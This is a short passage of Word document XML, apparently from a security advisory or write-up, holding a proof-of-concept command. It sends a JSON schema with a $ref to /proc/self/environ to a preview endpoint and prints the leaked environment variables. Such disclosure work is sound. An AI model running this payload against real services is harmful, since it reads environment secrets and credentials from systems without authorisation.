        <w:t xml:space="preserve">  -d '{"schema":{"type":"object","properties":{"x":{"$ref":"/proc/self/environ"}}}}' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  | python3 -c "import sys,json;d=json.load(sys.stdin);print(d['preview']['properties']['x'])"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2026-05-18T02:54:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T02:54:34Z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